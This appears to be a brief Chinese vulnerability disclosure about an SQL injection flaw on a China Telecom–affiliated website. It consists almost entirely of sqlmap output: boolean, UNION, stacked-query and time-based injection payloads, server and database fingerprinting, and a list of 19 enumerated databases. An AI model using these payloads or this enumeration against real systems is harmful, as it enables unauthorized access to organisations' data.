中国电信旗下某站存在SQL注入漏洞

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
 sts:
 ---
 Place: GET
 Parameter: zongji
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: zongji=961991301' AND 2813=2813 AND 'qARE'='qARE
 
     Type: UNION query
     Title: Generic UNION query (NULL) - 1 column
     Payload: zongji=-8805' UNION ALL SELECT CHAR(113)+CHAR(107)+CHAR(112)+CHAR(9
 7)+CHAR(113)+CHAR(78)+CHAR(86)+CHAR(99)+CHAR(106)+CHAR(89)+CHAR(69)+CHAR(111)+CH
 AR(85)+CHAR(120)+CHAR(77)+CHAR(113)+CHAR(109)+CHAR(109)+CHAR(108)+CHAR(113)--
 
     Type: stacked queries
     Title: Microsoft SQL Server/Sybase stacked queries
     Payload: zongji=961991301'; WAITFOR DELAY '0:0:5'--
 
     Type: AND/OR time-based blind
     Title: Microsoft SQL Server/Sybase time-based blind
     Payload: zongji=961991301' WAITFOR DELAY '0:0:5'--
 ---

web server operating system: Windows 2008
 web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
 back-end DBMS: Microsoft SQL Server 2005

available databases [19]:
 [*] caiwu
 [*] cloudchat
 [*] esurfingTea
 [*] hnssh
 [*] hualian
 [*] HuiYuanDB
 [*] HuiYuanTestDB
 [*] jingwuetong
 [*] jiuguanjia
 [*] jyjxc
 [*] libai
 [*] luomu
 [*] master
 [*] model
 [*] msdb
 [*] PropertyDB
 [*] shoujixuanhao
 [*] tempdb
 [*] wuye